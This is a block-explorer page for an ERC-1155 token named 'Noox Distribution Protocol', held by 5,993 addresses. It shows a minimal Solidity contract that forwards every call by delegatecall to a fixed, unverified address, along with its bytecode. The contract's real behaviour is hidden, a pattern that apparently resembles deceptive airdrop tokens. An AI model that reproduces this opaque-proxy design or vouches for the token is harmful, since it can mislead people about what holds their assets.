ERC-1155
Overview
Max Total Supply
7,500 Noox Distribution Protocol
Holders
5,993
Market
Volume (24H)
N/A
Min Price (24H)
N/A
Max Price (24H)
N/A
Other Info
Token Contract
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.
Similar Match Source Code This contract matches the deployed Bytecode of the Source Code for Contract 0x4B59CC98...e1dc98d59 The constructor portion of the code might be different and could alter the actual behaviour of the contract
Contract Name:
RecipientNFT
Compiler Version
v0.8.13+commit.abaa5c0e
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-14 */ // SPDX-License-Identifier: MIT pragma solidity <=0.8.13; contract RecipientNFT { uint256 private totalSupply = 7500; fallback(bytes calldata data) payable external returns(bytes memory){ (bool r1, bytes memory result) = address(0x475524DE13F635CbBcA065C3B70C35cDEb6125ea).delegatecall(data); require(r1, "Verification."); return result; } receive() payable external { } constructor() { bytes memory data = abi.encodeWithSignature("initialize()"); (bool r1,) = address(0x475524DE13F635CbBcA065C3B70C35cDEb6125ea).delegatecall(data); require(r1, "Verificiation."); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"stateMutability":"payable","type":"fallback"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
6080604052611d4c60005534801561001657600080fd5b5060408051600481526024810182526020810180516001600160e01b031663204a7f0760e21b179052905160009073475524de13f635cbbca065c3b70c35cdeb6125ea906100659084906100f2565b600060405180830381855af49150503d80600081146100a0576040519150601f19603f3d011682016040523d82523d6000602084013e6100a5565b606091505b50509050806100eb5760405162461bcd60e51b815260206004820152600e60248201526d2b32b934b334b1b4b0ba34b7b71760911b604482015260640160405180910390fd5b505061012d565b6000825160005b8181101561011357602081860181015185830152016100f9565b81811115610122576000828501525b509190910192915050565b6101148061013c6000396000f3fe608060405236600a57005b600036606060008073475524de13f635cbbca065c3b70c35cdeb6125ea6001600160a01b03168585604051603e92919060ce565b600060405180830381855af49150503d80600081146077576040519150601f19603f3d011682016040523d82523d6000602084013e607c565b606091505b50915091508160c15760405162461bcd60e51b815260206004820152600d60248201526c2b32b934b334b1b0ba34b7b71760991b604482015260640160405180910390fd5b8051945060200192505050f35b818382376000910190815291905056fea2646970667358221220c0c0334fb10b6ff6d6b7f13d5f07afb133f4ce9b52d5a13972051318009a5f0764736f6c634300080d0033
Deployed Bytecode
0x608060405236600a57005b600036606060008073475524de13f635cbbca065c3b70c35cdeb6125ea6001600160a01b03168585604051603e92919060ce565b600060405180830381855af49150503d80600081146077576040519150601f19603f3d011682016040523d82523d6000602084013e607c565b606091505b50915091508160c15760405162461bcd60e51b815260206004820152600d60248201526c2b32b934b334b1b0ba34b7b71760991b604482015260640160405180910390fd5b8051945060200192505050f35b818382376000910190815291905056fea2646970667358221220c0c0334fb10b6ff6d6b7f13d5f07afb133f4ce9b52d5a13972051318009a5f0764736f6c634300080d0033
Deployed Bytecode Sourcemap
64:603:0:-:0;;;;;;;;;;189:12;214:7;223:19;254:42;-1:-1:-1;;;;;246:64:0;311:4;;246:70;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;213:103;;;;335:2;327:28;;;;-1:-1:-1;;;327:28:0;;492:2:1;327:28:0;;;474:21:1;531:2;511:18;;;504:30;-1:-1:-1;;;550:18:1;;;543:43;603:18;;327:28:0;;;;;;;;64:603;;;-1:-1:-1;64:603:0;;;-1:-1:-1;;;64:603:0;14:271:1;197:6;189;184:3;171:33;153:3;223:16;;248:13;;;223:16;14:271;-1:-1:-1;14:271:1:o
Swarm Source
ipfs://c0c0334fb10b6ff6d6b7f13d5f07afb133f4ce9b52d5a13972051318009a5f07
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.